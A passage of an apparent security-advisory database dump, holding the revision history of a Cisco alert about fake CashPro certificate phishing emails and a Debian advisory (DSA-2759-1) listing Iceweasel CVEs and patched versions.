2013-June-17 13:33 GMT \n25 | Cisco Security has detected significant activity on May 28, 2013. \n \n| | 2013-May-28 14:35 GMT \n24 | Cisco Security has detected significant activity on May 24, 2013. \n \n| | 2013-May-24 19:41 GMT \n23 | Cisco Security has detected significant activity on May 20, 2013. \n \n| | 2013-May-20 18:06 GMT \n22 | Cisco Security has detected significant activity on May 13, 2013. \n \n| | 2013-May-13 20:58 GMT \n21 | Cisco Security has detected significant activity on April 29, 2013. \n \n| | 2013-April-29 15:10 GMT \n20 | Cisco Security has detected significant activity on April 26, 2013. \n \n| | 2013-April-26 13:35 GMT \n19 | Cisco Security has detected significant activity on April 25, 2013. \n \n| | 2013-April-25 16:03 GMT \n18 | Cisco Security has detected significant activity on April 22, 2013. \n \n| | 2013-April-22 20:52 GMT \n17 | Cisco Security has detected significant activity on April 18, 2013. \n \n| | 2013-April-18 20:05 GMT \n16 | Cisco Security has detected significant activity on April 15, 2013. \n \n| | 2013-April-15 20:49 GMT \n15 | Cisco Security has detected significant activity on April 11, 2013. \n \n| | 2013-April-11 19:37 GMT \n14 | Cisco Security has detected significant activity on April 9, 2013. \n \n| | 2013-April-09 19:34 GMT \n13 | Cisco Security has detected significant activity on April 8, 2013. \n \n| | 2013-April-08 19:43 GMT \n12 | Cisco Security has detected significant activity on April 4, 2013. \n \n| | 2013-April-04 21:48 GMT \n11 | Cisco Security has detected significant activity on April 3, 2013. \n \n| | 2013-April-03 19:01 GMT \n10 | Cisco Security has detected significant activity on March 21, 2013. \n \n| | 2013-March-21 16:42 GMT \n9 | Cisco Security has detected significant activity on March 15, 2013. \n \n| | 2013-March-18 19:14 GMT \n8 | Cisco Security has detected significant activity on March 14, 2013. \n \n| | 2013-March-15 21:44 GMT \n7 | Cisco Security has detected significant activity on March 14, 2013. \n \n| | 2013-March-14 20:05 GMT \n6 | Cisco Security has detected significant activity on March 13, 2013. \n \n| | 2013-March-13 19:28 GMT \n5 | Cisco Security has detected significant activity on March 11, 2013. \n \n| | 2013-March-11 19:59 GMT \n4 | Cisco Security has detected significant activity on February 28, 2013. \n \n| | 2013-March-01 16:55 GMT \n3 | Cisco Security has detected significant activity on February 26, 2013. \n \n| | 2013-February-26 21:48 GMT \n2 | Cisco Security has detected significant activity on February 20, 2013. \n \n| | 2013-February-21 20:35 GMT \n1 | Cisco Security has detected significant activity on February 20, 2013. | | 2013-February-20 19:42 GMT \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "modified": "2013-08-30T17:50:44", "published": "2013-02-20T19:42:42", "id": "CISCO-THREAT-28320", "href": "http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=28320", "type": "ciscothreats", "title": "Threat Outbreak Alert: Fake CashPro Online Digital Certificate Notification Email Messages on August 30, 2013", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2018-10-18T13:49:38", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2759-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 18, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : iceweasel\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1718 CVE-2013-1722 CVE-2013-1725 CVE-2013-1730 \n CVE-2013-1732 CVE-2013-1735 CVE-2013-1736 CVE-2013-1737\n\nMultiple security issues have been found in Iceweasel, Debian&#x27;s version\nof the Mozilla Firefox web browser: Multiple memory safety errors,\nbuffer overflows may lead to the execution of arbitrary code.\n\nThe Iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 17.0.9esr-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 24.0-1.\n\nWe recommend that you upgrade your iceweasel packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2013-09-18T13:40:03", "published": "2013-09-18T13:40:03", "id": "DEBIAN:DSA-2759-1:3FC95", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00170.html", "title": "[SECURITY] [DSA 2759-1] iceweasel security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}